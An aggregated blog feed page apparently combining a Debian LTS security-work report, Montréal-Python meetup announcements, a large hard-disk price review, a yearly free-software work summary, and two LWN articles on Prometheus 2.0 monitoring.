In Debian, this is especially an issue in maintainer scripts, which often call chown -R on arbitrary, non-root directories. Daniel Kahn Gillmor had reported this to the Debian security team all the way back in 2011, but it didn't get traction back then. He now opened Debian bug #889066 to at least enable a warning in lintian and an issue was also opened on colord Debian bug #889060, as an example, but many more packages are vulnerable. Again, this is only if hardening is somewhat turned off.

Normally, systemd is supposed to turn that hardening on, which should protect custom kernels, but this was turned off in Debian. Anyways, Debian still supports non-systemd init systems (although those users mostly probably all migrated to Devuan) so the fix wouldn't be complete. I have therefore filed Debian bug #889098 against procps (which owns /etc/sysctl.conf and related files) to try and fix the issue more broadly there.

And to be fair, this was very explicitly mentioned in the jessie release notes so those people without the protection kind of get what they desserve here...

p7zip

Lastly, I did a fairly trivial update of the p7zip package, which resulted in DLA-1268-1. The patch was sent upstream and went through a few iterations, including coordination with the security researcher.

Unfortunately, the latter wasn't willing to share the proof of concept (PoC) so that we could test the patch. We are therefore trusting the researcher that the fix works, which is too bad because they do not trust us with the PoC...

Other free software work

I probably did more stuff in January that wasn't documented in the previous report. But I don't know if it's worth my time going through all this. Expect a report in February instead!

Have happy new year and all that stuff.

Catégories: External Blogs

Montréal-Python 69 - Yogic Zumba

Montreal Python - mer, 01/31/2018 - 00:00

It may be the middle of winter but it's no reason to stay at home. Take out your warmest toque, your snowshoes and join us at Notman House for the first event of the season.

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations start
  • 7:30PM - Break
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations How to use PGP with Git and why you should care - Konstantin Ryabitsev

Git supports PGP signatures for the purposes of tracking code provenance and to ensure the integrity of repository clones across multiple mirrors. In this talk, we will discuss how your project can benefit from PGP-signing your tags and your commits, and will look at available resources that will help you get started with minimal pain.

Gestion de configuration - Michel Rondeau

La gestion de la configuration avec la librairie standard de Python est efficace tant que le format « ini » convient. Nous voulions la reproduire tout en supportant n’importe quel format de fichier. La solution retenue fonctionne par événements et plugiciel (plug-ins) afin d’ajouter ou d’enlever des fonctionnalités dynamiquement . Il est maintenant possible de gérer les formats Excel, Yaml, JSON, etc. Nous verrons comment mettre en place une fil d’événements élégante en Python telle qu’utiliser dans ce projet.

morpheOm - François Robert

Depuis que le Xerox Lab de Palo Alto a inventé le desktop, les interfaces usagers ont peu changé. Heureusement, téléphones et tablettes ont aidé, mais sommes-nous mûrs pour un plus grand changement ?

How to Aggregate User’s Interest Data using PySpark – A Short Tutorial - Abbas Taher

Spark is one the most popular Big Data frameworks and PySpark is the API to use Spark from Python. PySpark is a great choice when you need to scale up your jobs to work with large files. In this short tutorial we shall present 3 methods to aggregate data. First we shall use Python dictionaries, then we shall present the two methods “GroupBy” and “ReduceBy” to do the same aggregation work. The three code snippets will be presented and explained using a Jupyter Notebook.

When

February 5th at 6:00PM

Where

Notman House 51 Sherbrooke West Montréal, QC H2X 1X2

Catégories: External Blogs

4TB+ large disk price review

Anarcat - sam, 01/27/2018 - 20:39

For my personal backups, I am now looking at 4TB+ single-disk long-term storage. I currently have 3.5TB of offline storage, split in two disks: this is rather inconvenient as I need to plug both in a toaster-like SATA enclosure which gathers dusts and performs like crap. Now I'm looking at hosting offline backups at a friend's place so I need to store everything in a single drive, to save space.

This means I need at least 4TB of storage, and those needs are going to continuously expand in the future. Since this is going to be offsite, swapping the drive isn't really convenient (especially because syncing all that data takes a long time), so I figured I would also look at more than 4 TB.

So I built those neat little tables. I took the prices from Newegg.ca or Newegg.com as a fallback when the item wasn't available in Canada. I used to order from NCIX because it was "more" local, but they unfortunately went bankrupt and in the worse possible way: the website is still up and you can order stuff, but those orders never ship. Sad to see a 20-year old institution go out like that; I blame Jeff Bezos.

I also used failure rate figures from the latest Backblaze review, although those should always be taken with a grain of salt. For example, the apparently stellar 0.00% failure rates are all on sample sizes too small to be statistically significant (<100 drives).

All prices are in CAD, sometimes after conversion from USD for items that are not on newegg.ca, as of today.

8TB Brand Model Price $/TB fail% Notes HGST 0S04012 280$ 35$ N/A Seagate ST8000NM0055 320$ 40$ 1.04% WD WD80EZFX 364$ 46$ N/A Seagate ST8000DM002 380$ 48$ 0.72% HGST HUH728080ALE600 791$ 99$ 0.00% 6TB Brand Model Price $/TB fail% Notes HGST 0S04007 220$ 37$ N/A Seagate ST6000DX000 ~222$ 56$ 0.42% not on .ca, refurbished Seagate ST6000AS0002 230$ 38$ N/A WD WD60EFRX 280$ 47$ 1.80% Seagate STBD6000100 343$ 58$ N/A 4TB Brand Model Price $/TB fail% Notes Seagate ST4000DM004 125$ 31$ N/A Seagate ST4000DM000 150$ 38$ 3.28% WD WD40EFRX 155$ 39$ 0.00% HGST HMS5C4040BLE640 ~242$ 61$ 0.36% not on .ca Toshiba MB04ABA400V ~300$ 74$ 0.00% not on .ca Conclusion

Cheapest per TB costs seem to be in the 4TB range, but the 8TB HGST comes really close. Reliabilty for this drive could be an issue, however - I can't explain why it is so cheap compared to other devices... But I guess we'll see where it goes as I'll just order the darn thing and try it out.

Catégories: External Blogs

A summary of my 2017 work

Anarcat - sam, 01/27/2018 - 11:53

New years are strange things: for most arbitrary reasons, around January 1st we reset a bunch of stuff, change calendars and forget about work for a while. This is also when I forget to do my monthly report and then procrastinate until I figure out I might as well do a year report while I'm at it, and then do nothing at all for a while.

So this is my humble attempt at fixing this, about a month late. I'll try to cover December as well, but since not much has happened then, I figured I could also review the last year and think back on the trends there. Oh, and you'll get chocolate cookies of course. Hang on to your eyeballs, this won't hurt a bit.

Debian Long Term Support (LTS)

Those of you used to reading those reports might be tempted to skip this part, but wait! I actually don't have much to report here and instead you will find an incredibly insightful and relevant rant.

So I didn't actually do any LTS work in December. I actually reduced my available hours to focus on writing (more on that later). Overall, I ended up working about 11 hours per month on LTS in 2017. That is less than the 16-20 hours I was available during that time. Part of that is me regularly procrastinating, but another part is that finding work to do is sometimes difficult. The "easy" tasks often get picked and dispatched quickly, so the stuff that remains, when you're not constantly looking, is often very difficult packages.

I especially remember the pain of working on libreoffice, the KRACK update, more tiff, GraphicsMagick and ImageMagick vulnerabilities than I care to remember, and, ugh, Ruby... Masochists (also known as "security researchers") can find the details of those excruciating experiments in debian-lts for the monthly reports.

I don't want to sound like an old idiot, but I must admit, after working on LTS for two years, that working on patching old software for security bugs is hard work, and not particularly pleasant on top of it. You're basically always dealing with other people's garbage: badly written code that hasn't been touched in years, sometimes decades, that no one wants to take care of.

Yet someone needs to take care of it. A large part of the technical community considers Linux distributions in general, and LTS releases in particular, as "too old to care for". As if our elders, once they passed a certain age, should just be rolled out to the nearest dumpster or just left rotting on the curb. I suspect most people don't realize that Debian "stable" (stretch) was released less than a year ago, and "oldstable" (jessie) is a little over two years old. LTS (wheezy), our oldest supported release, is only four years old now, and will become unsupported this summer, on its fifth year anniversary. Five years may seem like a long time in computing but really, there's a whole universe out there and five years is absolutely nothing in the range of changes I'm interested in: politics, society and the environment range much beyond that shortsightedness.

To put things in perspective, some people I know still run their office on an Apple II, which celebrated its 40th anniversary this year. That is "old". And the fact that the damn thing still works should command respect and admiration, more than contempt. In comparison, the phone I have, an LG G3, is running an unpatched, vulnerable version of Android because it cannot be updated, because it's locked out of the telcos networks, because it was found in a taxi and reported "lost or stolen" (same thing, right?). And DRM protections in the bootloader keep me from doing the right thing and unbricking this device.

We should build devices that last decades. Instead we fill junkyards with tons and tons of precious computing devices that have more precious metals than most people carry as jewelry. We are wasting generations of programmers, hardware engineers, human robots and precious, rare metals on speculative, useless devices that are destroying our society. Working on supporting LTS is a small part in trying to fix the problem, but right now I can't help but think we have a problem upstream, in the way we build those tools in the first place. It's just depressing to be at the receiving end of the billions of lines of code that get created every year. Hopefully, the death of Moore's law could change that, but I'm afraid it's going to take another generation before programmers figure out how far away from their roots they have strayed. Maybe too long to keep ourselves from a civilization collapse.

LWN publications

With that gloomy conclusion, let's switch gears and talk about something happier. So as I mentioned, in December, I reduced my LTS hours and focused instead on finishing my coverage of KubeCon Austin for LWN.net. Three articles have already been published on the blog here:

... and two more articles, about Prometheus, are currently published as exclusives by LWN:

I was surprised to see that the container runtimes article got such traction. It wasn't the most important debate in the whole conference, but there were some amazingly juicy bits, some of which we didn't even cover because. Those were... uh... rather controversial and we want the community to stay sane. Or saner, if that word can be applied at all to the container community at this point.

I ended up publishing 16 articles at LWN this year. I'm really happy about that: I just love writing and even if it's in English (my native language is French), it's still better than rambling on my own like I do here. My editors allow me to publish well polished articles, and I am hugely grateful for the privilege. Each article takes about 13 hours to write, on average. I'm less happy about that: I wish delivery was more streamlined and I spare you the miserable story of last minute major changes I sent in some recent articles, to which I again apologize profusely to my editors.

I'm often at a loss when I need to explain to friends and family what I write about. I often give the example of the password series: I wrote a whole article about just how to pick a passphrase then a review of two geeky password managers and then a review of something that's not quite a password manager and you shouldn't be using. And on top of that, I even wrote an history of those but by that time my editors were sick and tired of passwords and understandably made me go away. At this point, neophytes are just scratching their heads and I remind them of the TL;DR:

  1. choose a proper password with a bunch of words picked at random (really random, check out Diceware!)

  2. use a password manager so you have to remember only one good password

  3. watch out where you type those damn things

I covered two other conferences this year as well: one was the NetDev conference, for which I wrote 4 articles (1, 2, 3, 4). It turned out I couldn't cover NetDev in Korea even though I wanted to, but hopefully that is just "partie remise" as we say in french... I also covered DebConf in Montreal, but that ended up being much harder than I thought: I got involved in networking and volunteered all over the place. By the time the conference started, I was too exhausted to do actually write anything, even though I took notes like crazy and ran around trying to attend everything. I found it's harder to write about topics that are close to home: nothing is new, so you don't get excited as much. I still enjoyed writing about the supposed decline of copyleft, which was based on a talk by FSF executive director John Sullivan, and I ended up writing about offline PGP key storage strategies and cryptographic keycards, after buying a token from friendly gniibe at DebConf.

I also wrote about Alioth moving to Pagure, unknowingly joining up with a long tradition of failed predictions at LWN: a few months later, the tide turned and Debian launched the Alioth replacement as a beta running... GitLab. Go figure - maybe this is the a version of the quantum observer effect applied to journalism?

Two articles seemed to have been less successful. The GitHub TOS update was less controversial than I expected it would be and didn't seem to have a significant impact, although GitHub did rephrase some bits of their TOS eventually. The ROCA review didn't seem to bring excited crowds either, maybe because no one actually understood anything I was saying (including myself).

Still, 2017 has been a great ride in LWN-land: I'm hoping to publish even more during the next year and encourage people to subscribe to the magazine, as it helps us publish new articles, if you like what you're reading here of course.

Free software work

Last but not least is my free software work. This was just nuts.

New programs

I have written a bunch of completely new programs:

  • Stressant - a small wrapper script to stress-test new machines. no idea if anyone's actually using the darn thing, but I have found it useful from time to time.

  • Wallabako - a bridge between Wallabag and my e-reader. This is probably one of my most popular programs ever. I get random strangers asking me about it in random places, which is quite nice. Also my first Golang program, something I am quite excited about and wish I was doing more of.

  • Ecdysis - a pile of (Python) code snippets, documentation and standard community practices I reuse across projects. Ended up being really useful when bootstrapping new projects, but probably just for me.

  • numpy-stats - a dumb commandline tool to extract stats from streams. didn't really reuse it so maybe not so useful. interestingly, found similar tools called multitime and hyperfine that will be useful for future benchmarks

  • feed2exec - a new feed reader (just that) which I have been using ever since for many different purposes. I have now replaced feed2imap and feed2tweet with that simple tool, and have added support for storing my articles on https://archive.org/, checking for dead links with linkchecker (below) and pushing to the growing Mastodon federation

  • undertime - a simple tool to show possible meeting times across different timezones. a must if you are working with people internationally!

If I count this right (and I'm omitting a bunch of smaller, less general purpose programs), that is six new software projects, just this year. This seems crazy, but that's what the numbers say. I guess I like programming too, which is arguably a form of writing. Talk about contributing to the pile of lines of code...

New maintainerships

I also got more or less deeply involved in various communities:

And those are just the major ones... I have about 100 repositories active on GitHub, most of which are forks of existing repositories, so actual contributions to existing free software projects. Hard numbers for this are annoyingly hard to come by as well, especially in terms of issues vs commits and so on. GitHub says I have made about 600 contributions in the last year, which is an interesting figure as well.

Debian contributions

I also did a bunch of things in the Debian project, apart from my LTS involvement:

  • Gave up on debmans, a tool I had written to rebuild https://manpages.debian.org, in the face of the overwhelming superiority of the Golang alternative. This is one of the things which lead me to finally try the language and write Wallabako. So: net win.

  • Proposed standard procedures for third-party repositories, which didn't seem to have caught up significantly in the real world. Hopefully just a matter of time...

  • Co-hosted a bug squashing party for the Debian stretch release, also as a way to have the DebConf team meet up.

  • That lead to a two hour workshop at Montreal DebConf which was packed and really appreciated. I'm thinking of organizing this at every DebConf I attend, in a (so far) secret plot to standardize packaging practices by evangelizing new package maintainers to my peculiar ways. I hope to teach again in Taiwan this year, but I'm not sure I'll make it that far across the globe...

  • And of course, I did a lot of regular package maintenance. I don't have good numbers on the exact activity stats here (any way to pull that out easily?) but I now directly maintain 34 Debian packages, a somewhat manageable number.

What's next?

This year, I'll need to figure out what to do with legacy projects. Gameclock and Monkeysign both need to be ported away from GTK2, which is deprecated. I will probably abandon the GUI in Monkeysign but gameclock will probably need a rewrite of its GUI. This begs the question of how we can maintain software in the longterm if even the graphical interface (even Xorg is going away!) is swept away under our feet all the time. Without this change, both software could have kept on going for another decade without trouble. But now, I need to spend time just to keep those tools from failing to build at all.

Wallabako seems to be doing well on its own, but I'd like to fix the refresh issues that make the reader sometimes unstable: maybe I can write directly to the SQLite database? I tried statically linking sqlite to do some tests about that, but that's apparently impossible and failed.

Feed2exec just works for me. I'm not very proud of the design, but it does its job well. I'll fix bugs and maybe push out a 1.0 release when a long enough delay goes by without any critical issues coming up. So try it out and report back!

As for the other projects, I'm not sure how it's going to go. It's possible that my involvement in paid work means I cannot commit as much to general free software work, but I can't help but just doing those drive-by contributions all the time. There's just too much stuff broken out there to sit by and watch the dumpster fire burn down the whole city.

I'll try to keep doing those reports, of which you can find an archive in monthly-report. Your comments, encouragements, and support make this worth it, so keep those coming!

Happy new year everyone: may it be better than the last, shouldn't be too hard...

PS: Here is the promised chocolate cookie:

Catégories: External Blogs

Changes in Prometheus 2.0

Anarcat - mer, 01/24/2018 - 19:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

2017 was a big year for the Prometheus project, as it published its 2.0 release in November. The new release ships numerous bug fixes, new features and, notably, a new storage engine that brings major performance improvements. This comes at the cost of incompatible changes to the storage and configuration-file formats. An overview of Prometheus and its new release was presented to the Kubernetes community in a talk held during KubeCon + CloudNativeCon. This article covers what changed in this new release and what is brewing next in the Prometheus community; it is a companion to this article, which provided a general introduction to monitoring with Prometheus.

What changed

Orchestration systems like Kubernetes regularly replace entire fleets of containers for deployments, which means rapid changes in parameters (or "labels" in Prometheus-talk) like hostnames or IP addresses. This was creating significant performance problems in Prometheus 1.0, which wasn't designed for such changes. To correct this, Prometheus ships a new storage engine that was specifically designed to handle continuously changing labels. This was tested by monitoring a Kubernetes cluster where 50% of the pods would be swapped every 10 minutes; the new design was proven to be much more effective. The new engine boasts a hundred-fold I/O performance improvement, a three-fold improvement in CPU, five-fold in memory usage, and increased space efficiency. This impacts container deployments, but it also means improvements for any configuration as well. Anecdotally, there was no noticeable extra load on the servers where I deployed Prometheus, at least nothing that the previous monitoring tool (Munin) could detect.

Prometheus 2.0 also brings new features like snapshot backups. The project has a longstanding design wart regarding data volatility: backups are deemed to be unnecessary in Prometheus because metrics data is considered disposable. According to Goutham Veeramanchaneni, one of the presenters at KubeCon, "this approach apparently doesn't work for the enterprise". Backups were possible in 1.x, but they involved using filesystem snapshots and stopping the server to get a consistent view of the on-disk storage. This implied downtime, which was unacceptable for certain production deployments. Thanks again to the new storage engine, Prometheus can now perform fast and consistent backups, triggered through the web API.

Another improvement is a fix to the longstanding staleness handling bug where it would take up to five minutes for Prometheus to notice when a target disappeared. In that case, when polling for new values (or "scraping" as it's called in Prometheus jargon) a failure would make Prometheus reuse the older, stale value, which meant that downtime would go undetected for too long and fail to trigger alerts properly. This would also cause problems with double-counting of some metrics when labels vary in the same measurement.

Another limitation related to staleness is that Prometheus wouldn't work well with scrape intervals above two minutes (instead of the default 15 seconds). Unfortunately, that is still not fixed in Prometheus 2.0 as the problem is more complicated than originally thought, which means there's still a hard limit to how slowly you can fetch metrics from targets. This, in turn, means that Prometheus is not well suited for devices that cannot support sub-minute refresh rates, which, to be fair, is rather uncommon. For slower devices or statistics, a solution might be the node exporter "textfile support", which we mentioned in the previous article, and the pushgateway daemon, which allows pushing results from the targets instead of having the collector pull samples from targets.

The migration path

One downside of this new release is that the upgrade path from the previous version is bumpy: since the storage format changed, Prometheus 2.0 cannot use the previous 1.x data files directly. In his presentation, Veeramanchaneni justified this change by saying this was consistent with the project's API stability promises: the major release was the time to "break everything we wanted to break". For those who can't afford to discard historical data, a possible workaround is to replicate the older 1.8 server to a new 2.0 replica, as the network protocols are still compatible. The older server can then be decommissioned when the retention window (which defaults to fifteen days) closes. While there is some work in progress to provide a way to convert 1.8 data storage to 2.0, new deployments should probably use the 2.0 release directly to avoid this peculiar migration pain.

Another key point in the migration guide is a change in the rules-file format. While 1.x used a custom file format, 2.0 uses YAML, matching the other Prometheus configuration files. Thankfully the promtool command handles this migration automatically. The new format also introduces rule groups, which improve control over the rules execution order. In 1.x, alerting rules were run sequentially but, in 2.0, the groups are executed sequentially and each group can have its own interval. This fixes the longstanding race conditions between dependent rules that create inconsistent results when rules would reuse the same queries. The problem should be fixed between groups, but rule authors still need to be careful of that limitation within a rule group.

Remaining limitations and future

As we saw in the introductory article, Prometheus may not be suitable for all workflows because of its limited default dashboards and alerts, but also because of the lack of data-retention policies. There are, however, discussions about variable per-series retention in Prometheus and native down-sampling support in the storage engine, although this is a feature some developers are not really comfortable with. When asked on IRC, Brian Brazil, one of the lead Prometheus developers, stated that "downsampling is a very hard problem, I don't believe it should be handled in Prometheus".

Besides, it is already possible to selectively delete an old series using the new 2.0 API. But Veeramanchaneni warned that this approach "puts extra pressure on Prometheus and unless you know what you are doing, its likely that you'll end up shooting yourself in the foot". A more common approach to native archival facilities is to use recording rules to aggregate samples and collect the results in a second server with a slower sampling rate and different retention policy. And of course, the new release features external storage engines that can better support archival features. Those solutions are obviously not suitable for smaller deployments, which therefore need to make hard choices about discarding older samples or getting more disk space.

As part of the staleness improvements, Brazil also started working on "isolation" (the "I" in the ACID acronym) so that queries wouldn't see "partial scrapes". This hasn't made the cut for the 2.0 release, and is still work in progress, with some performance impacts (about 5% CPU and 10% RAM). This work would also be useful when heavy contention occurs in certain scenarios where Prometheus gets stuck on locking. Some of the performance impact could therefore be offset under heavy load.

Another performance improvement mentioned during the talk is an eventual query-engine rewrite. The current query engine can sometimes cause excessive loads for certain expensive queries, according the Prometheus security guide. The goal would be to optimize the current engine so that those expensive queries wouldn't harm performance.

Finally, another issue I discovered is that 32-bit support is limited in Prometheus 2.0. The Debian package maintainers found that the test suite fails on i386, which lead Debian to remove the package from the i386 architecture. It is currently unclear if this is a bug in Prometheus: indeed, it is strange that Debian tests actually pass in other 32-bit architectures like armel. Brazil, in the bug report, argued that "Prometheus isn't going to be very useful on a 32bit machine". The position of the project is currently that "'if it runs, it runs' but no guarantees or effort beyond that from our side".

I had the privilege to meet the Prometheus team at the conference in Austin and was happy to see different consultants and organizations working together on the project. It reminded me of my golden days in the Drupal community: different companies cooperating on the same project in a harmonious environment. If Prometheus can keep that spirit together, it will be a welcome change from the drama that affected certain monitoring software. This new Prometheus release could light a bright path for the future of monitoring in the free software world.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Montréal-Python 69 - Call For Proposals

Montreal Python - mer, 01/17/2018 - 00:00

First of all, the Montreal-Python team would like to wish you a Happy New Year!

With every new year, there's resolutions made. If presenting at a the tech event is on your list of resolutions, here's your chance to cross it off your list early. Montreal Python opens the call for presentations for our events of 2018. ( Feel free to submit your proposal - whether you have resolutions or not ;) )

Send us your proposal at team@montrealpython.org. We have spots for lightning talks (5 min) or regular talks (15 to 30 min)

When

February 5th, 2018 at 6:00PM

Where

TBD

Catégories: External Blogs

Monitoring with Prometheus 2.0

Anarcat - mar, 01/16/2018 - 19:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

Prometheus is a monitoring tool built from scratch by SoundCloud in 2012. It works by pulling metrics from monitored services and storing them in a time series database (TSDB). It has a powerful query language to inspect that database, create alerts, and plot basic graphs. Those graphs can then be used to detect anomalies or trends for (possibly automated) resource provisioning. Prometheus also has extensive service discovery features and supports high availability configurations. That's what the brochure says, anyway; let's see how it works in the hands of an old grumpy system administrator. I'll be drawing comparisons with Munin and Nagios frequently because those are the tools I have used for over a decade in monitoring Unix clusters.

Monitoring with Prometheus and Grafana

What distinguishes Prometheus from other solutions is the relative simplicity of its design: for one, metrics are exposed over HTTP using a special URL (/metrics) and a simple text format. Here is, as an example, some network metrics for a test machine:

$ curl -s http://curie:9100/metrics | grep node_network_.*_bytes # HELP node_network_receive_bytes Network device statistic receive_bytes. # TYPE node_network_receive_bytes gauge node_network_receive_bytes{device="eth0"} 2.720630123e+09 # HELP node_network_transmit_bytes Network device statistic transmit_bytes. # TYPE node_network_transmit_bytes gauge node_network_transmit_bytes{device="eth0"} 4.03286677e+08

In the above example, the metrics are named node_network_receive_bytes and node_network_transmit_bytes. They have a single label/value pair(device=eth0) attached to them, along with the value of the metrics themselves. This is only a couple of hundreds of metrics (usage of CPU, memory, disk, temperature, and so on) exposed by the "node exporter", a basic stats collector running on monitored hosts. Metrics can be counters (e.g. per-interface packet counts), gauges (e.g. temperature or fan sensors), or histograms. The latter allow, for example, 95th percentiles analysis, something that has been missing from Munin forever and is essential to billing networking customers. Another popular use for histograms is maintaining an Apdex score, to make sure that N requests are answered in X time. The various metrics types are carefully analyzed before being stored to correctly handle conditions like overflows (which occur surprisingly often on gigabit network interfaces) or resets (when a device restarts).

Those metrics are fetched from "targets", which are simply HTTP endpoints, added to the Prometheus configuration file. Targets can also be automatically added through various discovery mechanisms, like DNS, that allow having a single A or SRV record that lists all the hosts to monitor; or Kubernetes or cloud-provider APIs that list all containers or virtual machines to monitor. Discovery works in real time, so it will correctly pick up changes in DNS, for example. It can also add metadata (e.g. IP address found or server state), which is useful for dynamic environments such as Kubernetes or containers orchestration in general.

Once collected, metrics can be queried through the web interface, using a custom language called PromQL. For example, a query showing the average bandwidth over the last minute for interface eth0 would look like:

rate(node_network_receive_bytes{device="eth0"}[1m])

Notice the "device" label, which we use to restrict the search to a single interface. This query can also be plotted into a simple graph on the web interface:

What is interesting here is not really the node exporter metrics themselves, as those are fairly standard in any monitoring solution. But in Prometheus, any (web) application can easily expose its own internal metrics to the monitoring server through regular HTTP, whereas other systems would require special plugins, on both the monitoring server and the application side. Note that Munin follows a similar pattern, but uses its own text protocol on top of TCP, which means it is harder to implement for web apps and diagnose with a web browser.

However, coming from the world of Munin, where all sorts of graphics just magically appear out of the box, this first experience can be a bit of a disappointment: everything is built by hand and ephemeral. While there are ways to add custom graphs to the Prometheus web interface using Go-based console templates, most Prometheus deployments generally use Grafana to render the results using custom-built dashboards. This gives much better results, and allows graphing multiple machines separately, using the Node Exporter Server Metrics dashboard:

All this work took roughly an hour of configuration, which is pretty good for a first try. Things get tougher when extending those basic metrics: because of the system's modularity, it is difficult to add new metrics to existing dashboards. For example, web or mail servers are not monitored by the node exporter. So monitoring a web server involves installing an Apache-specific exporter that needs to be added to the Prometheus configuration. But it won't show up automatically in the above dashboard, because that's a "node exporter" dashboard, not an Apache dashboard. So you need a separate dashboard for that. This is all work that's done automatically in Munin without any hand-holding.

Even then, Apache is a relatively easy one; monitoring some arbitrary server not supported by a custom exporter will require installing a program like mtail, which parses the server's logfiles to expose some metrics to Prometheus. There doesn't seem to be a way to write quick "run this command to count files" plugins that would allow administrators to write quick hacks. The options available are writing a new exporter using client libraries, which seems to be a rather large undertaking for non-programmers. You can also use the node exporter textfile option, which reads arbitrary metrics from plain text files in a directory. It's not as direct as running a shell command, but may be good enough for some use cases. Besides, there are a large number of exporters already available, including ones that can tap into existing Nagios and Munin servers to allow for a smooth transition.

Unfortunately, those exporters will only give you metrics, not graphs. To graph metrics from a third-party Postfix exporter, a graph must be created by hand in Grafana, with a magic PromQL formula. This may involve too much clicking around in a web browser for grumpy old administrators. There are tools like Grafanalib to programmatically create dashboards, but those also involve a lot of boilerplate. When building a custom application, however, creating graphs may actually be a fun and distracting task that some may enjoy. The Grafana/Prometheus design is certainly enticing and enables powerful abstractions that are not readily available with other monitoring systems.

Alerting and high availability

So far, we've worked only with a single server, and did only graphing. But Prometheus also supports sending alarms when things go bad. After working over a decade as a system administrator, I have mixed feelings about "paging" or "alerting" as it's called in Prometheus. Regardless of how well the system is tweaked, I have come to believe it is basically impossible to design a system that will respect workers and not torture on-call personnel through sleep-deprivation. It seems it's a feature people want regardless, especially in the enterprise, so let's look at how it works here.

In Prometheus, you design alerting rules using PromQL. For example, to warn operators when a network interface is close to saturation, we could set the following rule:

alert: HighBandwidthUsage expr: rate(node_network_transmit_bytes{device="eth0"}[1m]) > 0.95*1e+09 for: 5m labels: severity: critical annotations: description: 'Unusually high bandwidth on interface {{ $labels.device }}' summary: 'High bandwidth on {{ $labels.instance }}'

Those rules are regularly checked and matching rules are fired to an alertmanager daemon that can receive alerts from multiple Prometheus servers. The alertmanager then deduplicates multiple alerts, regroups them (so a single notification is sent even if multiple alerts are received), and sends the actual notifications through various services like email, PagerDuty, Slack or an arbitrary webhook.

The Alertmanager has a "gossip protocol" to enable multiple instances to coordinate notifications. This design allows you to run multiple Prometheus servers in a federation model, all simultaneously collecting metrics, and sending alerts to redundant Alertmanager instances to create a highly available monitoring system. Those who have struggled with such setups in Nagios will surely appreciate the simplicity of this design.

The downside is that Prometheus doesn't ship a set of default alerts and exporters do not define default alerting thresholds that could be used to create rules automatically. The Prometheus documentation also lacks examples that the community could use, so alerting is harder to deploy than in classic monitoring systems.

Issues and limitations

Prometheus is already well-established: Cloudflare, Canonical and (of course) SoundCloud are all (still) using it in production. It is a common monitoring tool used in Kubernetes deployments because of its discovery features. Prometheus is, however, not a silver bullet and may not the best tool for all workloads.

In particular, Prometheus is not designed for long-term storage. By default, it keeps samples for only two weeks, which seems rather small to old system administrators who are used to RRDtool databases that efficiently store samples for years. As a comparison, my test Prometheus instance is taking up as much space for five days of samples as Munin, which has samples for the last year. Of course, Munin only collects metrics every five minutes while Prometheus samples all targets every 15 seconds by default. Even so, this difference in sizes shows that Prometheus's disk requirements are much larger than traditional RRDtool implementations because it lacks native down-sampling facilities. Therefore, retaining samples for more than a year (which is a Munin limitation I was hoping to overcome) will be difficult without some serious hacking to selectively purge samples or adding extra disk space.

The project documentation recognizes this and suggests using alternatives:

Prometheus's local storage is limited in its scalability and durability. Instead of trying to solve long-term storage in Prometheus itself, Prometheus has a set of interfaces that allow integrating with remote long-term storage systems.

Prometheus in itself delivers good performance: a single instance can support over 100,000 samples per second. When a single server is not enough, servers can federate to cover different parts of the infrastructure. And when that is not enough sharding is possible. In general, performance is dependent on avoiding variable data in labels, which keeps the cardinality of the dataset under control, but the dataset size will grow with time regardless. So long-term storage is not Prometheus' strongest suit. But starting with 2.0, Prometheus can finally write to (and read from) external storage engines that can be more efficient than Prometheus. InfluxDB, for example, can be used as a backend and supports time-based down-sampling that makes long-term storage manageable. This deployment, however, is not for the faint of heart.

Also, security freaks can't help but notice that all this is happening over a clear-text HTTP protocol. Indeed, that is by design, "Prometheus and its components do not provide any server-side authentication, authorisation, or encryption. If you require this, it is recommended to use a reverse proxy." The issue is punted to a layer above, which is fine for the web interface: it is, after all, just a few Prometheus instances that need to be protected. But for monitoring endpoints, this is potentially hundreds of services that are available publicly without any protection. It would be nice to have at least IP-level blocking in the node exporter, although this could also be accomplished through a simple firewall rule.

There is a large empty space for Prometheus dashboards and alert templates. Whereas tools like Munin or Nagios had years to come up with lots of plugins and alerts, and to converge on best practices like "70% disk usage is a warning but 90% is critical", those things all need to be configured manually in Prometheus. Prometheus should aim at shipping standard sets of dashboards and alerts for built-in metrics, but the project currently lacks the time to implement those.

The Grafana list of Prometheus dashboards shows one aspect of the problem: there are many different dashboards, sometimes multiple ones for the same task, and it's unclear which one is the best. There is therefore space for a curated list of dashboards and a definite need for expanding those to feature more extensive coverage.

As a replacement for traditional monitoring tools, Prometheus may not be quite there yet, but it will get there and I would certainly advise administrators to keep an eye on the project. Besides, Munin and Nagios feature-parity is just a requirement from an old grumpy system administrator. For hip young application developers smoking weird stuff in containers, Prometheus is the bomb. Just take for example how GitLab started integrating Prometheus, not only to monitor GitLab.com itself, but also to monitor the continuous-integration and deployment workflow. By integrating monitoring into development workflows, developers are immediately made aware of the performance impacts of proposed changes. Performance regressions can therefore be trivially identified quickly, which is a powerful tool for any application.

Whereas system administrators may want to wait a bit before converting existing monitoring systems to Prometheus, application developers should certainly consider deploying Prometheus to instrument their applications, it will serve them well.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Epic Lameness

Eric Dorland - lun, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Catégories: External Blogs

Sentiment Sharing

Eric Dorland - lun, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Catégories: External Blogs
Syndiquer le contenu